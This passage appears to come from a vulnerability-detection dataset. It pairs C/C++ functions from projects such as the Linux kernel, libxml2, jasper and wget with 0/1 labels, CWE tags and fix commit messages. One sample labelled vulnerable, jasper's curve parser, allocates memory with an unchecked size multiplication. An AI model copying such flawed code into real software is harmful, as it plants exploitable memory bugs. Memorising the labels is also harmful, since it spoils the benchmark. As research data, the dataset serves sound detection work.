vt_ioctl+0x16dc/0x1e30 drivers/tty/vt/vt_ioctl.c:818
tty_ioctl+0x9db/0x11b0 drivers/tty/tty_io.c:2660
[...]
Fixes: 4001d7b7fc27 ("vt: push down the tty lock so we can see what is left to tackle")
Cc: <[email protected]> # v3.4+
Reported-by: [email protected]
Acked-by: Jiri Slaby <[email protected]>
Signed-off-by: Eric Biggers <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
xmlSchemaResolveUnionMemberTypes(xmlSchemaParserCtxtPtr ctxt,
xmlSchemaTypePtr type)
{
xmlSchemaTypeLinkPtr link, lastLink, newLink;
xmlSchemaTypePtr memberType;
/*
* SPEC (1) "If the <union> alternative is chosen, then [Definition:]
* define the explicit members as the type definitions `resolved`
* to by the items in the `actual value` of the memberTypes [attribute],
* if any, followed by the type definitions corresponding to the
* <simpleType>s among the [children] of <union>, if any."
*/
/*
* Resolve references.
*/
link = type->memberTypes;
lastLink = NULL;
while (link != NULL) {
const xmlChar *name, *nsName;
name = ((xmlSchemaQNameRefPtr) link->type)->name;
nsName = ((xmlSchemaQNameRefPtr) link->type)->targetNamespace;
memberType = xmlSchemaGetType(ctxt->schema, name, nsName);
if ((memberType == NULL) || (! WXS_IS_SIMPLE(memberType))) {
xmlSchemaPResCompAttrErr(ctxt, XML_SCHEMAP_SRC_RESOLVE,
WXS_BASIC_CAST type, type->node, "memberTypes",
name, nsName, XML_SCHEMA_TYPE_SIMPLE, NULL);
/*
* Remove the member type link.
*/
if (lastLink == NULL)
type->memberTypes = link->next;
else
lastLink->next = link->next;
newLink = link;
link = link->next;
xmlFree(newLink);
} else {
link->type = memberType;
lastLink = link;
link = link->next;
}
}
/*
* Add local simple types,
*/
memberType = type->subtypes;
while (memberType != NULL) {
link = (xmlSchemaTypeLinkPtr) xmlMalloc(sizeof(xmlSchemaTypeLink));
if (link == NULL) {
xmlSchemaPErrMemory(ctxt, "allocating a type link", NULL);
return (-1);
}
link->type = memberType;
link->next = NULL;
if (lastLink == NULL)
type->memberTypes = link;
else
lastLink->next = link;
lastLink = link;
memberType = memberType->next;
}
return (0);
}
| 0 |
[
"CWE-134"
] |
libxml2
|
4472c3a5a5b516aaf59b89be602fbce52756c3e9
| 130,784,828,568,431,760,000,000,000,000,000,000,000 | 67 |
Fix some format string warnings with possible format string vulnerability
For https://bugzilla.gnome.org/show_bug.cgi?id=761029
Decorate every method in libxml2 with the appropriate
LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups
following the reports.
|
static int __init debug_guardpage_minorder_setup(char *buf)
{
unsigned long res;
if (kstrtoul(buf, 10, &res) < 0 || res > MAX_ORDER / 2) {
pr_err("Bad debug_guardpage_minorder value\n");
return 0;
}
_debug_guardpage_minorder = res;
pr_info("Setting debug_guardpage_minorder to %lu\n", res);
return 0;
}
| 0 |
[] |
linux
|
400e22499dd92613821374c8c6c88c7225359980
| 173,417,973,308,487,900,000,000,000,000,000,000,000 | 12 |
mm: don't warn about allocations which stall for too long
Commit 63f53dea0c98 ("mm: warn about allocations which stall for too
long") was a great step for reducing possibility of silent hang up
problem caused by memory allocation stalls. But this commit reverts it,
for it is possible to trigger OOM lockup and/or soft lockups when many
threads concurrently called warn_alloc() (in order to warn about memory
allocation stalls) due to current implementation of printk(), and it is
difficult to obtain useful information due to limitation of synchronous
warning approach.
Current printk() implementation flushes all pending logs using the
context of a thread which called console_unlock(). printk() should be
able to flush all pending logs eventually unless somebody continues
appending to printk() buffer.
Since warn_alloc() started appending to printk() buffer while waiting
for oom_kill_process() to make forward progress when oom_kill_process()
is processing pending logs, it became possible for warn_alloc() to force
oom_kill_process() loop inside printk(). As a result, warn_alloc()
significantly increased possibility of preventing oom_kill_process()
from making forward progress.
---------- Pseudo code start ----------
Before warn_alloc() was introduced:
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
}
goto retry;
After warn_alloc() was introduced:
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
} else if (waited_for_10seconds()) {
atomic_inc(&printk_pending_logs);
}
goto retry;
---------- Pseudo code end ----------
Although waited_for_10seconds() becomes true once per 10 seconds,
unbounded number of threads can call waited_for_10seconds() at the same
time. Also, since threads doing waited_for_10seconds() keep doing
almost busy loop, the thread doing print_one_log() can use little CPU
resource. Therefore, this situation can be simplified like
---------- Pseudo code start ----------
retry:
if (mutex_trylock(&oom_lock)) {
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_lock)
} else {
atomic_inc(&printk_pending_logs);
}
goto retry;
---------- Pseudo code end ----------
when printk() is called faster than print_one_log() can process a log.
One of possible mitigation would be to introduce a new lock in order to
make sure that no other series of printk() (either oom_kill_process() or
warn_alloc()) can append to printk() buffer when one series of printk()
(either oom_kill_process() or warn_alloc()) is already in progress.
Such serialization will also help obtaining kernel messages in readable
form.
---------- Pseudo code start ----------
retry:
if (mutex_trylock(&oom_lock)) {
mutex_lock(&oom_printk_lock);
while (atomic_read(&printk_pending_logs) > 0) {
atomic_dec(&printk_pending_logs);
print_one_log();
}
// Send SIGKILL here.
mutex_unlock(&oom_printk_lock);
mutex_unlock(&oom_lock)
} else {
if (mutex_trylock(&oom_printk_lock)) {
atomic_inc(&printk_pending_logs);
mutex_unlock(&oom_printk_lock);
}
}
goto retry;
---------- Pseudo code end ----------
But this commit does not go that direction, for we don't want to
introduce a new lock dependency, and we unlikely be able to obtain
useful information even if we serialized oom_kill_process() and
warn_alloc().
Synchronous approach is prone to unexpected results (e.g. too late [1],
too frequent [2], overlooked [3]). As far as I know, warn_alloc() never
helped with providing information other than "something is going wrong".
I want to consider asynchronous approach which can obtain information
during stalls with possibly relevant threads (e.g. the owner of
oom_lock and kswapd-like threads) and serve as a trigger for actions
(e.g. turn on/off tracepoints, ask libvirt daemon to take a memory dump
of stalling KVM guest for diagnostic purpose).
This commit temporarily loses ability to report e.g. OOM lockup due to
unable to invoke the OOM killer due to !__GFP_FS allocation request.
But asynchronous approach will be able to detect such situation and emit
warning. Thus, let's remove warn_alloc().
[1] https://bugzilla.kernel.org/show_bug.cgi?id=192981
[2] http://lkml.kernel.org/r/CAM_iQpWuPVGc2ky8M-9yukECtS+zKjiDasNymX7rMcBjBFyM_A@mail.gmail.com
[3] commit db73ee0d46379922 ("mm, vmscan: do not loop on too_many_isolated for ever"))
Link: http://lkml.kernel.org/r/1509017339-4802-1-git-send-email-penguin-kernel@I-love.SAKURA.ne.jp
Signed-off-by: Tetsuo Handa <[email protected]>
Reported-by: Cong Wang <[email protected]>
Reported-by: yuwang.yuwang <[email protected]>
Reported-by: Johannes Weiner <[email protected]>
Acked-by: Michal Hocko <[email protected]>
Acked-by: Johannes Weiner <[email protected]>
Cc: Vlastimil Babka <[email protected]>
Cc: Mel Gorman <[email protected]>
Cc: Dave Hansen <[email protected]>
Cc: Sergey Senozhatsky <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Steven Rostedt <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static loff_t fuse_file_llseek(struct file *file, loff_t offset, int whence)
{
loff_t retval;
struct inode *inode = file_inode(file);
/* No i_mutex protection necessary for SEEK_CUR and SEEK_SET */
if (whence == SEEK_CUR || whence == SEEK_SET)
return generic_file_llseek(file, offset, whence);
mutex_lock(&inode->i_mutex);
retval = fuse_update_attributes(inode, NULL, file, NULL);
if (!retval)
retval = generic_file_llseek(file, offset, whence);
mutex_unlock(&inode->i_mutex);
return retval;
}
| 0 |
[
"CWE-399",
"CWE-835"
] |
linux
|
3ca8138f014a913f98e6ef40e939868e1e9ea876
| 32,531,486,765,553,454,000,000,000,000,000,000,000 | 17 |
fuse: break infinite loop in fuse_fill_write_pages()
I got a report about unkillable task eating CPU. Further
investigation shows, that the problem is in the fuse_fill_write_pages()
function. If iov's first segment has zero length, we get an infinite
loop, because we never reach iov_iter_advance() call.
Fix this by calling iov_iter_advance() before repeating an attempt to
copy data from userspace.
A similar problem is described in 124d3b7041f ("fix writev regression:
pan hanging unkillable and un-straceable"). If zero-length segmend
is followed by segment with invalid address,
iov_iter_fault_in_readable() checks only first segment (zero-length),
iov_iter_copy_from_user_atomic() skips it, fails at second and
returns zero -> goto again without skipping zero-length segment.
Patch calls iov_iter_advance() before goto again: we'll skip zero-length
segment at second iteraction and iov_iter_fault_in_readable() will detect
invalid address.
Special thanks to Konstantin Khlebnikov, who helped a lot with the commit
description.
Cc: Andrew Morton <[email protected]>
Cc: Maxim Patlasov <[email protected]>
Cc: Konstantin Khlebnikov <[email protected]>
Signed-off-by: Roman Gushchin <[email protected]>
Signed-off-by: Miklos Szeredi <[email protected]>
Fixes: ea9b9907b82a ("fuse: implement perform_write")
Cc: <[email protected]>
|
static int ext4_do_update_inode(handle_t *handle,
struct inode *inode,
struct ext4_iloc *iloc)
{
struct ext4_inode *raw_inode = ext4_raw_inode(iloc);
struct ext4_inode_info *ei = EXT4_I(inode);
struct buffer_head *bh = iloc->bh;
struct super_block *sb = inode->i_sb;
int err = 0, rc, block;
int need_datasync = 0, set_large_file = 0;
uid_t i_uid;
gid_t i_gid;
projid_t i_projid;
spin_lock(&ei->i_raw_lock);
/* For fields not tracked in the in-memory inode,
* initialise them to zero for new inodes. */
if (ext4_test_inode_state(inode, EXT4_STATE_NEW))
memset(raw_inode, 0, EXT4_SB(inode->i_sb)->s_inode_size);
raw_inode->i_mode = cpu_to_le16(inode->i_mode);
i_uid = i_uid_read(inode);
i_gid = i_gid_read(inode);
i_projid = from_kprojid(&init_user_ns, ei->i_projid);
if (!(test_opt(inode->i_sb, NO_UID32))) {
raw_inode->i_uid_low = cpu_to_le16(low_16_bits(i_uid));
raw_inode->i_gid_low = cpu_to_le16(low_16_bits(i_gid));
/*
* Fix up interoperability with old kernels. Otherwise, old inodes get
* re-used with the upper 16 bits of the uid/gid intact
*/
if (ei->i_dtime && list_empty(&ei->i_orphan)) {
raw_inode->i_uid_high = 0;
raw_inode->i_gid_high = 0;
} else {
raw_inode->i_uid_high =
cpu_to_le16(high_16_bits(i_uid));
raw_inode->i_gid_high =
cpu_to_le16(high_16_bits(i_gid));
}
} else {
raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
raw_inode->i_gid_low = cpu_to_le16(fs_high2lowgid(i_gid));
raw_inode->i_uid_high = 0;
raw_inode->i_gid_high = 0;
}
raw_inode->i_links_count = cpu_to_le16(inode->i_nlink);
EXT4_INODE_SET_XTIME(i_ctime, inode, raw_inode);
EXT4_INODE_SET_XTIME(i_mtime, inode, raw_inode);
EXT4_INODE_SET_XTIME(i_atime, inode, raw_inode);
EXT4_EINODE_SET_XTIME(i_crtime, ei, raw_inode);
err = ext4_inode_blocks_set(handle, raw_inode, ei);
if (err) {
spin_unlock(&ei->i_raw_lock);
goto out_brelse;
}
raw_inode->i_dtime = cpu_to_le32(ei->i_dtime);
raw_inode->i_flags = cpu_to_le32(ei->i_flags & 0xFFFFFFFF);
if (likely(!test_opt2(inode->i_sb, HURD_COMPAT)))
raw_inode->i_file_acl_high =
cpu_to_le16(ei->i_file_acl >> 32);
raw_inode->i_file_acl_lo = cpu_to_le32(ei->i_file_acl);
if (ei->i_disksize != ext4_isize(inode->i_sb, raw_inode)) {
ext4_isize_set(raw_inode, ei->i_disksize);
need_datasync = 1;
}
if (ei->i_disksize > 0x7fffffffULL) {
if (!ext4_has_feature_large_file(sb) ||
EXT4_SB(sb)->s_es->s_rev_level ==
cpu_to_le32(EXT4_GOOD_OLD_REV))
set_large_file = 1;
}
raw_inode->i_generation = cpu_to_le32(inode->i_generation);
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
if (old_valid_dev(inode->i_rdev)) {
raw_inode->i_block[0] =
cpu_to_le32(old_encode_dev(inode->i_rdev));
raw_inode->i_block[1] = 0;
} else {
raw_inode->i_block[0] = 0;
raw_inode->i_block[1] =
cpu_to_le32(new_encode_dev(inode->i_rdev));
raw_inode->i_block[2] = 0;
}
} else if (!ext4_has_inline_data(inode)) {
for (block = 0; block < EXT4_N_BLOCKS; block++)
raw_inode->i_block[block] = ei->i_data[block];
}
if (likely(!test_opt2(inode->i_sb, HURD_COMPAT))) {
u64 ivers = ext4_inode_peek_iversion(inode);
raw_inode->i_disk_version = cpu_to_le32(ivers);
if (ei->i_extra_isize) {
if (EXT4_FITS_IN_INODE(raw_inode, ei, i_version_hi))
raw_inode->i_version_hi =
cpu_to_le32(ivers >> 32);
raw_inode->i_extra_isize =
cpu_to_le16(ei->i_extra_isize);
}
}
BUG_ON(!ext4_has_feature_project(inode->i_sb) &&
i_projid != EXT4_DEF_PROJID);
if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
EXT4_FITS_IN_INODE(raw_inode, ei, i_projid))
raw_inode->i_projid = cpu_to_le32(i_projid);
ext4_inode_csum_set(inode, raw_inode, ei);
spin_unlock(&ei->i_raw_lock);
if (inode->i_sb->s_flags & SB_LAZYTIME)
ext4_update_other_inodes_time(inode->i_sb, inode->i_ino,
bh->b_data);
BUFFER_TRACE(bh, "call ext4_handle_dirty_metadata");
rc = ext4_handle_dirty_metadata(handle, NULL, bh);
if (!err)
err = rc;
ext4_clear_inode_state(inode, EXT4_STATE_NEW);
if (set_large_file) {
BUFFER_TRACE(EXT4_SB(sb)->s_sbh, "get write access");
err = ext4_journal_get_write_access(handle, EXT4_SB(sb)->s_sbh);
if (err)
goto out_brelse;
ext4_update_dynamic_rev(sb);
ext4_set_feature_large_file(sb);
ext4_handle_sync(handle);
err = ext4_handle_dirty_super(handle, sb);
}
ext4_update_inode_fsync_trans(handle, inode, need_datasync);
out_brelse:
brelse(bh);
ext4_std_error(inode->i_sb, err);
return err;
}
| 0 |
[
"CWE-416"
] |
linux
|
eb9b5f01c33adebc31cbc236c02695f605b0e417
| 130,423,449,155,567,820,000,000,000,000,000,000,000 | 139 |
ext4: bubble errors from ext4_find_inline_data_nolock() up to ext4_iget()
If ext4_find_inline_data_nolock() returns an error it needs to get
reflected up to ext4_iget(). In order to fix this,
ext4_iget_extra_inode() needs to return an error (and not return
void).
This is related to "ext4: do not allow external inodes for inline
data" (which fixes CVE-2018-11412) in that in the errors=continue
case, it would be useful to for userspace to receive an error
indicating that file system is corrupted.
Signed-off-by: Theodore Ts'o <[email protected]>
Reviewed-by: Andreas Dilger <[email protected]>
Cc: [email protected]
|
void gf_net_set_ntp_shift(s32 shift)
{
ntp_shift = GF_NTP_SEC_1900_TO_1970 + shift;
}
| 0 |
[
"CWE-787"
] |
gpac
|
f3698bb1bce62402805c3fda96551a23101a32f9
| 327,631,945,152,168,330,000,000,000,000,000,000,000 | 4 |
fix buffer overrun in gf_bin128_parse
closes #1204
closes #1205
|
void Init(const char* syscall,
const char* data,
size_t len,
enum encoding encoding) {
syscall_ = syscall;
encoding_ = encoding;
if (data != nullptr) {
CHECK(!has_data_);
buffer_.AllocateSufficientStorage(len + 1);
buffer_.SetLengthAndZeroTerminate(len);
memcpy(*buffer_, data, len);
has_data_ = true;
}
}
| 0 |
[
"CWE-416"
] |
node
|
7f178663ebffc82c9f8a5a1b6bf2da0c263a30ed
| 337,057,958,514,175,850,000,000,000,000,000,000,000 | 15 |
src: use unique_ptr for WriteWrap
This commit attempts to avoid a use-after-free error by using unqiue_ptr
and passing a reference to it.
CVE-ID: CVE-2020-8265
Fixes: https://github.com/nodejs-private/node-private/issues/227
PR-URL: https://github.com/nodejs-private/node-private/pull/238
Reviewed-By: Michael Dawson <[email protected]>
Reviewed-By: Tobias Nießen <[email protected]>
Reviewed-By: Richard Lau <[email protected]>
|
void http2OptionsFromTuple(envoy::config::core::v3::Http2ProtocolOptions& options,
const absl::optional<const Http2SettingsTuple>& tp) {
options.mutable_hpack_table_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::HpackTableSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_HPACK_TABLE_SIZE);
options.mutable_max_concurrent_streams()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::MaxConcurrentStreams>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_MAX_CONCURRENT_STREAMS);
options.mutable_initial_stream_window_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::InitialStreamWindowSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_INITIAL_STREAM_WINDOW_SIZE);
options.mutable_initial_connection_window_size()->set_value(
(tp.has_value()) ? ::testing::get<SettingsTupleIndex::InitialConnectionWindowSize>(*tp)
: CommonUtility::OptionsLimits::DEFAULT_INITIAL_CONNECTION_WINDOW_SIZE);
options.set_allow_metadata(allow_metadata_);
options.set_stream_error_on_invalid_http_messaging(stream_error_on_invalid_http_messaging_);
options.mutable_max_outbound_frames()->set_value(max_outbound_frames_);
options.mutable_max_outbound_control_frames()->set_value(max_outbound_control_frames_);
options.mutable_max_consecutive_inbound_frames_with_empty_payload()->set_value(
max_consecutive_inbound_frames_with_empty_payload_);
options.mutable_max_inbound_priority_frames_per_stream()->set_value(
max_inbound_priority_frames_per_stream_);
options.mutable_max_inbound_window_update_frames_per_data_frame_sent()->set_value(
max_inbound_window_update_frames_per_data_frame_sent_);
}
| 0 |
[
"CWE-400"
] |
envoy
|
0e49a495826ea9e29134c1bd54fdeb31a034f40c
| 14,948,553,196,945,226,000,000,000,000,000,000,000 | 25 |
http/2: add stats and stream flush timeout (#139)
This commit adds a new stream flush timeout to guard against a
remote server that does not open window once an entire stream has
been buffered for flushing. Additional stats have also been added
to better understand the codecs view of active streams as well as
amount of data buffered.
Signed-off-by: Matt Klein <[email protected]>
|
static bool create_db_dir(char *fnam)
{
int ret;
char *p;
size_t len;
len = strlen(fnam);
p = alloca(len + 1);
(void)strlcpy(p, fnam, len + 1);
fnam = p;
p = p + 1;
again:
while (*p && *p != '/')
p++;
if (!*p)
return true;
*p = '\0';
ret = mkdir(fnam, 0755);
if (ret < 0 && errno != EEXIST) {
usernic_error("Failed to create %s: %s\n", fnam,
strerror(errno));
*p = '/';
return false;
}
*(p++) = '/';
goto again;
}
| 0 |
[
"CWE-417"
] |
lxc
|
c1cf54ebf251fdbad1e971679614e81649f1c032
| 337,792,692,931,540,820,000,000,000,000,000,000,000 | 31 |
CVE 2018-6556: verify netns fd in lxc-user-nic
Signed-off-by: Christian Brauner <[email protected]>
|
QPDF::writeHPageOffset(BitWriter& w)
{
HPageOffset& t = this->m->page_offset_hints;
w.writeBitsInt(t.min_nobjects, 32); // 1
w.writeBitsInt(toI(t.first_page_offset), 32); // 2
w.writeBitsInt(t.nbits_delta_nobjects, 16); // 3
w.writeBitsInt(t.min_page_length, 32); // 4
w.writeBitsInt(t.nbits_delta_page_length, 16); // 5
w.writeBitsInt(t.min_content_offset, 32); // 6
w.writeBitsInt(t.nbits_delta_content_offset, 16); // 7
w.writeBitsInt(t.min_content_length, 32); // 8
w.writeBitsInt(t.nbits_delta_content_length, 16); // 9
w.writeBitsInt(t.nbits_nshared_objects, 16); // 10
w.writeBitsInt(t.nbits_shared_identifier, 16); // 11
w.writeBitsInt(t.nbits_shared_numerator, 16); // 12
w.writeBitsInt(t.shared_denominator, 16); // 13
int nitems = toI(getAllPages().size());
std::vector<HPageOffsetEntry>& entries = t.entries;
write_vector_int(w, nitems, entries,
t.nbits_delta_nobjects,
&HPageOffsetEntry::delta_nobjects);
write_vector_int(w, nitems, entries,
t.nbits_delta_page_length,
&HPageOffsetEntry::delta_page_length);
write_vector_int(w, nitems, entries,
t.nbits_nshared_objects,
&HPageOffsetEntry::nshared_objects);
write_vector_vector(w, nitems, entries,
&HPageOffsetEntry::nshared_objects,
t.nbits_shared_identifier,
&HPageOffsetEntry::shared_identifiers);
write_vector_vector(w, nitems, entries,
&HPageOffsetEntry::nshared_objects,
t.nbits_shared_numerator,
&HPageOffsetEntry::shared_numerators);
write_vector_int(w, nitems, entries,
t.nbits_delta_content_offset,
&HPageOffsetEntry::delta_content_offset);
write_vector_int(w, nitems, entries,
t.nbits_delta_content_length,
&HPageOffsetEntry::delta_content_length);
}
| 0 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 326,101,661,557,597,850,000,000,000,000,000,000,000 | 45 |
Fix sign and conversion warnings (major)
This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
|
static void esp_fifo_push(Fifo8 *fifo, uint8_t val)
{
if (fifo8_num_used(fifo) == fifo->capacity) {
trace_esp_error_fifo_overrun();
return;
}
fifo8_push(fifo, val);
}
| 0 |
[
"CWE-476"
] |
qemu
|
e5455b8c1c6170c788f3c0fd577cc3be53539a99
| 108,517,159,262,597,100,000,000,000,000,000,000,000 | 9 |
esp: consolidate esp_cmdfifo_push() into esp_fifo_push()
Each FIFO currently has its own push functions with the only difference being
the capacity check. The original reason for this was that the fifo8
implementation doesn't have a formal API for retrieving the FIFO capacity,
however there are multiple examples within QEMU where the capacity field is
accessed directly.
Change esp_fifo_push() to access the FIFO capacity directly and then consolidate
esp_cmdfifo_push() into esp_fifo_push().
Signed-off-by: Mark Cave-Ayland <[email protected]>
Reviewed-by: Philippe Mathieu-Daudé <[email protected]>
Tested-by: Alexander Bulekov <[email protected]>
Message-Id: <[email protected]>
|
static int jas_icccurv_input(jas_iccattrval_t *attrval, jas_stream_t *in,
int cnt)
{
jas_icccurv_t *curv = &attrval->data.curv;
unsigned int i;
curv->numents = 0;
curv->ents = 0;
if (jas_iccgetuint32(in, &curv->numents))
goto error;
if (!(curv->ents = jas_malloc(curv->numents * sizeof(jas_iccuint16_t))))
goto error;
for (i = 0; i < curv->numents; ++i) {
if (jas_iccgetuint16(in, &curv->ents[i]))
goto error;
}
if (JAS_CAST(int, 4 + 2 * curv->numents) != cnt)
goto error;
return 0;
error:
jas_icccurv_destroy(attrval);
return -1;
}
| 1 |
[
"CWE-189"
] |
jasper
|
3c55b399c36ef46befcb21e4ebc4799367f89684
| 60,058,086,348,133,480,000,000,000,000,000,000,000 | 26 |
At many places in the code, jas_malloc or jas_recalloc was being
invoked with the size argument being computed in a manner that would not
allow integer overflow to be detected. Now, these places in the code
have been modified to use special-purpose memory allocation functions
(e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow.
This should fix many security problems.
|
smtp_proceed_connected(struct smtp_session *s)
{
if (s->listener->flags & F_SMTPS)
smtp_cert_init(s);
else
smtp_send_banner(s);
}
| 0 |
[
"CWE-78",
"CWE-252"
] |
src
|
9dcfda045474d8903224d175907bfc29761dcb45
| 24,708,195,817,065,332,000,000,000,000,000,000,000 | 7 |
Fix a security vulnerability discovered by Qualys which can lead to a
privileges escalation on mbox deliveries and unprivileged code execution
on lmtp deliveries, due to a logic issue causing a sanity check to be
missed.
ok eric@, millert@
|
static void nfs4_recovery_handle_error(struct nfs_client *clp, int error)
{
switch (error) {
case -NFS4ERR_CB_PATH_DOWN:
nfs_handle_cb_pathdown(clp);
break;
case -NFS4ERR_STALE_CLIENTID:
case -NFS4ERR_LEASE_MOVED:
set_bit(NFS4CLNT_LEASE_EXPIRED, &clp->cl_state);
nfs4_state_start_reclaim_reboot(clp);
break;
case -NFS4ERR_EXPIRED:
set_bit(NFS4CLNT_LEASE_EXPIRED, &clp->cl_state);
nfs4_state_start_reclaim_nograce(clp);
}
}
| 0 |
[
"CWE-703"
] |
linux
|
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
| 14,614,983,781,805,120,000,000,000,000,000,000,000 | 16 |
NFSv4: Convert the open and close ops to use fmode
Signed-off-by: Trond Myklebust <[email protected]>
|
PHP_FUNCTION(imagesx)
{
zval *IM;
gdImagePtr im;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &IM) == FAILURE) {
return;
}
ZEND_FETCH_RESOURCE(im, gdImagePtr, &IM, -1, "Image", le_gd);
RETURN_LONG(gdImageSX(im));
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
php-src
|
2938329ce19cb8c4197dec146c3ec887c6f61d01
| 101,412,428,770,624,070,000,000,000,000,000,000,000 | 13 |
Fixed bug #66356 (Heap Overflow Vulnerability in imagecrop())
And also fixed the bug: arguments are altered after some calls
|
gethttp (const struct url *u, struct url *original_url, struct http_stat *hs,
int *dt, struct url *proxy, struct iri *iri, int count)
{
struct request *req = NULL;
char *type = NULL;
char *user, *passwd;
char *proxyauth;
int statcode;
int write_error;
wgint contlen, contrange;
const struct url *conn;
FILE *fp;
int err;
uerr_t retval;
#ifdef HAVE_HSTS
#ifdef TESTING
/* we don't link against main.o when we're testing */
hsts_store_t hsts_store = NULL;
#else
extern hsts_store_t hsts_store;
#endif
const char *hsts_params;
time_t max_age;
bool include_subdomains;
#endif
int sock = -1;
/* Set to 1 when the authorization has already been sent and should
not be tried again. */
bool auth_finished = false;
/* Set to 1 when just globally-set Basic authorization has been sent;
* should prevent further Basic negotiations, but not other
* mechanisms. */
bool basic_auth_finished = false;
/* Whether NTLM authentication is used for this request. */
bool ntlm_seen = false;
/* Whether our connection to the remote host is through SSL. */
bool using_ssl = false;
/* Whether a HEAD request will be issued (as opposed to GET or
POST). */
bool head_only = !!(*dt & HEAD_ONLY);
/* Whether conditional get request will be issued. */
bool cond_get = !!(*dt & IF_MODIFIED_SINCE);
#ifdef HAVE_METALINK
/* Are we looking for metalink info in HTTP headers? */
bool metalink = !!(*dt & METALINK_METADATA);
#endif
char *head = NULL;
struct response *resp = NULL;
char hdrval[512];
char *message = NULL;
/* Declare WARC variables. */
bool warc_enabled = (opt.warc_filename != NULL);
FILE *warc_tmp = NULL;
char warc_timestamp_str [21];
char warc_request_uuid [48];
ip_address *warc_ip = NULL;
off_t warc_payload_offset = -1;
/* Whether this connection will be kept alive after the HTTP request
is done. */
bool keep_alive;
/* Is the server using the chunked transfer encoding? */
bool chunked_transfer_encoding = false;
/* Whether keep-alive should be inhibited. */
bool inhibit_keep_alive =
!opt.http_keep_alive || opt.ignore_length;
/* Headers sent when using POST. */
wgint body_data_size = 0;
#ifdef HAVE_SSL
if (u->scheme == SCHEME_HTTPS)
{
/* Initialize the SSL context. After this has once been done,
it becomes a no-op. */
if (!ssl_init ())
{
scheme_disable (SCHEME_HTTPS);
logprintf (LOG_NOTQUIET,
_("Disabling SSL due to encountered errors.\n"));
retval = SSLINITFAILED;
goto cleanup;
}
}
#endif /* HAVE_SSL */
/* Initialize certain elements of struct http_stat. */
hs->len = 0;
hs->contlen = -1;
hs->res = -1;
hs->rderrmsg = NULL;
hs->newloc = NULL;
xfree (hs->remote_time);
hs->error = NULL;
hs->message = NULL;
hs->local_encoding = ENC_NONE;
hs->remote_encoding = ENC_NONE;
conn = u;
{
uerr_t ret;
req = initialize_request (u, hs, dt, proxy, inhibit_keep_alive,
&basic_auth_finished, &body_data_size,
&user, &passwd, &ret);
if (req == NULL)
{
retval = ret;
goto cleanup;
}
}
retry_with_auth:
/* We need to come back here when the initial attempt to retrieve
without authorization header fails. (Expected to happen at least
for the Digest authorization scheme.) */
if (opt.cookies)
request_set_header (req, "Cookie",
cookie_header (wget_cookie_jar,
u->host, u->port, u->path,
#ifdef HAVE_SSL
u->scheme == SCHEME_HTTPS
#else
0
#endif
),
rel_value);
/* Add the user headers. */
if (opt.user_headers)
{
int i;
for (i = 0; opt.user_headers[i]; i++)
request_set_user_header (req, opt.user_headers[i]);
}
proxyauth = NULL;
if (proxy)
{
conn = proxy;
initialize_proxy_configuration (u, req, proxy, &proxyauth);
}
keep_alive = true;
/* Establish the connection. */
if (inhibit_keep_alive)
keep_alive = false;
{
uerr_t conn_err = establish_connection (u, &conn, hs, proxy, &proxyauth, &req,
&using_ssl, inhibit_keep_alive, &sock);
if (conn_err != RETROK)
{
retval = conn_err;
goto cleanup;
}
}
/* Open the temporary file where we will write the request. */
if (warc_enabled)
{
warc_tmp = warc_tempfile ();
if (warc_tmp == NULL)
{
CLOSE_INVALIDATE (sock);
retval = WARC_TMP_FOPENERR;
goto cleanup;
}
if (! proxy)
{
warc_ip = (ip_address *) alloca (sizeof (ip_address));
socket_ip_address (sock, warc_ip, ENDPOINT_PEER);
}
}
/* Send the request to server. */
write_error = request_send (req, sock, warc_tmp);
if (write_error >= 0)
{
if (opt.body_data)
{
DEBUGP (("[BODY data: %s]\n", opt.body_data));
write_error = fd_write (sock, opt.body_data, body_data_size, -1);
if (write_error >= 0 && warc_tmp != NULL)
{
int warc_tmp_written;
/* Remember end of headers / start of payload. */
warc_payload_offset = ftello (warc_tmp);
/* Write a copy of the data to the WARC record. */
warc_tmp_written = fwrite (opt.body_data, 1, body_data_size, warc_tmp);
if (warc_tmp_written != body_data_size)
write_error = -2;
}
}
else if (opt.body_file && body_data_size != 0)
{
if (warc_tmp != NULL)
/* Remember end of headers / start of payload */
warc_payload_offset = ftello (warc_tmp);
